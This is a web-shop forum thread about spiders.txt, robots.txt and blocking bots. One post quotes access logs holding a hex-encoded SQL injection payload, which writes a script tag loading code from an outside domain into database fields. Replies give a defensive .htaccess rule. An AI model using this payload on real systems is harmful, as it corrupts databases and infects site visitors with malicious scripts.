Jump to content
stevel

Updated spiders.txt Official Support Topic

Recommended Posts

Copy the text in the code box into Notepad:

 

User-agent: *
Disallow: /store/catalog/account.php
Disallow: /store/catalog/account_edit.php
Disallow: /store/catalog/account_history.php
Disallow: /store/catalog/account_history_info.php
Disallow: /store/catalog/account_password.php
Disallow: /store/catalog/address_book.php
Disallow: /store/catalog/address_book_process.php
Disallow: /store/catalog/advanced_search.php
Disallow: /store/catalog/checkout_confirmation.php
Disallow: /store/catalog/checkout_payment.php
Disallow: /store/catalog/checkout_payment_address.php
Disallow: /store/catalog/checkout_process.php
Disallow: /store/catalog/checkout_shipping.php
Disallow: /store/catalog/checkout_shipping_address.php
Disallow: /store/catalog/checkout_success.php
Disallow: /store/catalog/cookie_usage.php
Disallow: /store/catalog/create_account.php
Disallow: /store/catalog/create_account_success.php
Disallow: /store/catalog/login.php
Disallow: /store/catalog/password_forgotten.php
Disallow: /store/catalog/popup_image.php
Disallow: /store/catalog/shopping_cart.php
Disallow: /store/catalog/product_reviews_write.php

Save it as robots.txt

 

Upload it into the / (root folder) on your site.


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

Yahoo should not be getting a session ID as "slurp" is in the spiders.txt file. What evidence do you have that it is getting a new ID? Note that if you allowed Yahoo to index your site before enabling "prevent spider sessions", it may have saved a session ID at that time. While it won't get a new one, it can keep reusing the old one.

 

The advice on adding pages to robots.txt is good.

Share this post


Link to post
Share on other sites
Have you tried to disallow that page in your "robots.txt" file?

:unsure:

 

 

Thanks for your help

:)

Share this post


Link to post
Share on other sites

I have some suspicious activities going on on my web site, it must be a script running. It changes its IP very frequently. I tried to block the IPs but it's no way to block all of them. Here is what I have in my access_log:

 

76.108.90.33 - - [16/Aug/2008:02:50:53 -0600] "GET /product_info.php?pName=product';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172

283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F5220736

56C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973

636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752

720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970

653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204

645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320

5748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617

465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F74

69746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F637

37273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E

6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2

F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27

2727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542

C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4341544520546162

6C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 8973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705)"

69.113.44.135 - - [16/Aug/2008:06:27:55 -0600] "GET /?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172

283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F5220736

56C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973

636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752

720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970

653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204

645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320

5748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617

465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F74

69746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F637

37273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E

6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2

F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27

2727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542

C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4341544520546162

6C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 25376 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 1.41.1 ; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"

69.113.44.135 - - [16/Aug/2008:06:29:37 -0600] "GET /?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172

283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F5220736

56C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973

636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752

720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970

653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204

645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320

5748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617

465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F74

69746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F637

37273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E

6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2

F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27

2727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542

C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4341544520546162

6C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 7745 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 1.41.1 ; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"

69.113.44.135 - - [16/Aug/2008:06:29:38 -0600] "GET /index.php?cPath=22_23';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172

283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F5220736

56C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973

636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752

720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970

653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204

645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320

5748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617

465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F74

69746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F637

37273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E

6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2

F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27

2727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542

C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4341544520546162

6C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 8142 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 1.41.1 ; .NET CLR 1.0.3705; .NET CLR 2.0.50727)"

 

Is there anything I can to block these activities?

Share this post


Link to post
Share on other sites

This is trying to attack your site with an SQL injection technique. One possible defense is to write a .htaccess rule that fails the request if the GET parameters include a "@" character - I don't think this would occur in a normal request. spiders.txt isn't going to help you here.

Share this post


Link to post
Share on other sites
This is trying to attack your site with an SQL injection technique. One possible defense is to write a .htaccess rule that fails the request if the GET parameters include a "@" character - I don't think this would occur in a normal request. spiders.txt isn't going to help you here.

Steve, can you please help me to make up a .htaccess rule? So far I have the following in my .htaccess:

# $Id: .htaccess,v 1.3 2003/06/12 10:53:20 hpdl Exp $

 

# Set some options

Options -Indexes

Options FollowSymLinks

 

RewriteEngine on

RewriteBase /

#

# Skip the next two rewriterules if NOT a spider

RewriteCond %{HTTP_USER_AGENT} !(msnbot|slurp|googlebot) [NC]

RewriteRule .* - [s=2]

#

# case: leading and trailing parameters

RewriteCond %{QUERY_STRING} ^(.+)&osCsid=[0-9a-z]+&(.+)$ [NC]

RewriteRule (.*) $1?%1&%2 [R=301,L]

#

# case: leading-only, trailing-only or no additional parameters

RewriteCond %{QUERY_STRING} ^(.+)&osCsid=[0-9a-z]+$|^osCsid=[0-9a-z]+&?(.*)$ [NC]

RewriteRule (.*) $1?%1 [R=301,L]

#

RewriteCond %{QUERY_STRING} :/ [NC]

RewriteRule ^ - [F]

 

RedirectMatch 301 /osCommerce/(.*) http://shop.com/$1

RedirectMatch 301 /osCommerce/product_info.php(.*) http://shop.com/product_info.php$1

 

#

# This is used with Apache WebServers

#

# For this to work, you must include the parameter 'Options' to

# the AllowOverride configuration

#

# Example:

#

# <Directory "/usr/local/apache/htdocs">

# AllowOverride Options

# </Directory>

#

# 'All' with also work. (This configuration is in the

# apache/conf/httpd.conf file)

 

# The following makes adjustments to the SSL protocol for Internet

# Explorer browsers

 

<IfModule mod_setenvif.c>

<IfDefine SSL>

SetEnvIf User-Agent ".*MSIE.*" \

nokeepalive ssl-unclean-shutdown \

downgrade-1.0 force-response-1.0

</IfDefine>

</IfModule>

 

# If Search Engine Friendly URLs do not work, try enabling the

# following Apache configuration parameter

#

# AcceptPathInfo On

 

# Fix certain PHP values

# (commented out by default to prevent errors occuring on certain

# servers)

#

#<IfModule mod_php4.c>

# php_value session.use_trans_sid 0

# php_value register_globals 1

#</IfModule>

Thanks in advance.

Share this post


Link to post
Share on other sites

This should work (I think):

 

RewriteCond %{QUERY_STRING} @ [NC]

RewriteRule ^ - [F]

 

That @ might have to be written as \@

 

I suggest searching your access logs for other occurrences of @ to make sure I have not overlooked a legitimate use of this.

Share this post


Link to post
Share on other sites
This should work (I think):

 

RewriteCond %{QUERY_STRING} @ [NC]

RewriteRule ^ - [F]

 

That @ might have to be written as \@

 

I suggest searching your access logs for other occurrences of @ to make sure I have not overlooked a legitimate use of this.

No, I don't see any other occurrences of @ in my access logs, except for these attacks. So, is it how I need to modify my .htaccess to include the new rule:

# $Id: .htaccess,v 1.3 2003/06/12 10:53:20 hpdl Exp $

# Set some options
Options -Indexes
Options FollowSymLinks

RewriteEngine on
RewriteBase /
#
# Skip the next two rewriterules if NOT a spider
RewriteCond %{HTTP_USER_AGENT} !(msnbot|slurp|googlebot) [NC]
RewriteRule .* - [S=2]
#
# case: leading and trailing parameters
RewriteCond %{QUERY_STRING} ^(.+)&osCsid=[0-9a-z]+&(.+)$ [NC]
RewriteRule (.*) $1?%1&%2 [R=301,L]
#
# case: leading-only, trailing-only or no additional parameters
RewriteCond %{QUERY_STRING} ^(.+)&osCsid=[0-9a-z]+$|^osCsid=[0-9a-z]+&?(.*)$ [NC]
RewriteRule (.*) $1?%1 [R=301,L]
#
RewriteCond %{QUERY_STRING} :/ [NC]
RewriteRule ^ - [F]
#
RewriteCond %{QUERY_STRING} @ [NC]
RewriteRule ^ - [F]

RedirectMatch 301 /osCommerce/(.*) http://shop.com/$1
RedirectMatch 301 /osCommerce/product_info.php(.*) http://shop.com/product_info.php$1

#
# This is used with Apache WebServers
#
# For this to work, you must include the parameter 'Options' to
# the AllowOverride configuration
#
# Example:
#
# <Directory "/usr/local/apache/htdocs">
# AllowOverride Options
# </Directory>
#
# 'All' with also work. (This configuration is in the
# apache/conf/httpd.conf file)

# The following makes adjustments to the SSL protocol for Internet
# Explorer browsers

<IfModule mod_setenvif.c>
<IfDefine SSL>
SetEnvIf User-Agent ".*MSIE.*" \
nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0
</IfDefine>
</IfModule>

# If Search Engine Friendly URLs do not work, try enabling the
# following Apache configuration parameter
#
# AcceptPathInfo On

# Fix certain PHP values
# (commented out by default to prevent errors occuring on certain
# servers)
#
#<IfModule mod_php4.c>
# php_value session.use_trans_sid 0
# php_value register_globals 1
#</IfModule>

Thanks.

Share this post


Link to post
Share on other sites

would this htaccess file be very individual to ones shop or could i just go and copy it and use it for my shop?

where does it need to go exactly?

 

 

Thanks, Steve.

Share this post


Link to post
Share on other sites
From what I can tell, spiders.txt is not being used on your store. I switched the user agent to Googlebot and it still got a session. I did notice with your store something I have seen with others in that even on the first page, the links don't have a session ID in the URL, indicating that a cookie was set initially. I'd be curious to know how that was done. But in any event, the "prevent spider sessions" code is not running.

 

Would you be so kind as to test again please? I've done some adjustments....


Absinthe Original Liquor Store

Share this post


Link to post
Share on other sites

Guys need help again.

 

what do i add to my spiders.txt to stop

 

This one

 

IP Address: 91.205.124.3

 

User Agent: Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)

Share this post


Link to post
Share on other sites

Add: Yanga WorldSearch to your spiders.txt file. If that doesn't work then ban the ip address by .htaccess.

 

Vger

Share this post


Link to post
Share on other sites
Add: Yanga WorldSearch to your spiders.txt file. If that doesn't work then ban the ip address by .htaccess.

 

Vger

 

Thanks will try that :)

Share this post


Link to post
Share on other sites
Add: Yanga WorldSearch to your spiders.txt file. Vger

 

This did not work

Share this post


Link to post
Share on other sites
Add: Yanga WorldSearch to your spiders.txt file. If that doesn't work then ban the ip address by .htaccess.

 

Vger

 

 

Thanks For your help, All i had to do was add Yanga [Only] not Yanga WorldSearch.

 

:) All you guys are great

Share this post


Link to post
Share on other sites

Hi Guys,

 

today I had visit from one "computer" which hit my site very often.

I dont know, if this is a spider, or if we have an update here.

 

Here are the information:

IP-address : 82.226.37.240

Client: nor75-3-82-226-37-240.fbx.proxad.net

GeoIP says, that the spider comes from France.

 

Since I found no further info of them, perhaps some of you guys knows more.

 

If so, any feedback would be appreciated.

 

Regards

Andreas

Share this post


Link to post
Share on other sites

spider5.mail.ru

Name: Guest

 

ID: 0

 

IP Address: 195.239.211.234

 

User Agent: Mail.Ru/1.0

 

can this spider be added to the spider.txt file if YES the can some one tell me how

 

Thanks in advance

Share this post


Link to post
Share on other sites

Im new here and i think this is a good idea. So i downloaded your contrib' and just deleted my original spiders.txt file and uploaded your one and the spiders-large.txt file. Is this right and do i have to do anything else.

Share this post


Link to post
Share on other sites
Im new here and i think this is a good idea. So i downloaded your contrib' and just deleted my original spiders.txt file and uploaded your one and the spiders-large.txt file. Is this right and do i have to do anything else.

You use either the spiders.txt or the spiders-large.txt, not both.

 

The large can slow things down, but if you want to use it, rename it to spiders.txt (I think it says this in the instructions anyway).

 

If you do not have a robots.txt file, you should get one (add ons area).


The Coopco Underwear Shop

 

If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.

Share this post


Link to post
Share on other sites

Hi, Steve. You know, I just found that this rewrite rule creates a problem with "Customer Survey" contribution. When I click a link to survey from email (looks like this: http://store.com/survey.php?&email=val...;order_num=622), I get

Forbidden

You don't have permission to access /survey.php on this server.

Since an e-mail address does have an @ symbol, that rewrite rule matches and sends a Forbidden page. Can you please help me to rewrite the rule to prevent a Forbidden page when accessing the survey.php? I appreciate your help. Thanks.

No, I don't see any other occurrences of @ in my access logs, except for these attacks. So, is it how I need to modify my .htaccess to include the new rule:

# $Id: .htaccess,v 1.3 2003/06/12 10:53:20 hpdl Exp $

# Set some options
Options -Indexes
Options FollowSymLinks

RewriteEngine on
RewriteBase /
#
# Skip the next two rewriterules if NOT a spider
RewriteCond %{HTTP_USER_AGENT} !(msnbot|slurp|googlebot) [NC]
RewriteRule .* - [S=2]
#
# case: leading and trailing parameters
RewriteCond %{QUERY_STRING} ^(.+)&osCsid=[0-9a-z]+&(.+)$ [NC]
RewriteRule (.*) $1?%1&%2 [R=301,L]
#
# case: leading-only, trailing-only or no additional parameters
RewriteCond %{QUERY_STRING} ^(.+)&osCsid=[0-9a-z]+$|^osCsid=[0-9a-z]+&?(.*)$ [NC]
RewriteRule (.*) $1?%1 [R=301,L]
#
RewriteCond %{QUERY_STRING} :/ [NC]
RewriteRule ^ - [F]
#
RewriteCond %{QUERY_STRING} @ [NC]
RewriteRule ^ - [F]

RedirectMatch 301 /osCommerce/(.*) http://shop.com/$1
RedirectMatch 301 /osCommerce/product_info.php(.*) http://shop.com/product_info.php$1

#
# This is used with Apache WebServers
#
# For this to work, you must include the parameter 'Options' to
# the AllowOverride configuration
#
# Example:
#
# <Directory "/usr/local/apache/htdocs">
# AllowOverride Options
# </Directory>
#
# 'All' with also work. (This configuration is in the
# apache/conf/httpd.conf file)

# The following makes adjustments to the SSL protocol for Internet
# Explorer browsers

<IfModule mod_setenvif.c>
<IfDefine SSL>
SetEnvIf User-Agent ".*MSIE.*" \
nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0
</IfDefine>
</IfModule>

# If Search Engine Friendly URLs do not work, try enabling the
# following Apache configuration parameter
#
# AcceptPathInfo On

# Fix certain PHP values
# (commented out by default to prevent errors occuring on certain
# servers)
#
#<IfModule mod_php4.c>
# php_value session.use_trans_sid 0
# php_value register_globals 1
#</IfModule>

Thanks.

Share this post


Link to post
Share on other sites

Im listed in google but its only my home page theres no other pages, its been like 4 weeks, is this normal, and i deleted my original spiders.txt file and replaced it with the one in the crontribs package, was i ment to do this?

 

 

Thanks

Rishi

Share this post


Link to post
Share on other sites
Im listed in google but its only my home page theres no other pages, its been like 4 weeks, is this normal, and i deleted my original spiders.txt file and replaced it with the one in the crontribs package, was i ment to do this?

 

 

Thanks

Rishi

Post 467, and post 467, and post 467 :angry:


The Coopco Underwear Shop

 

If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×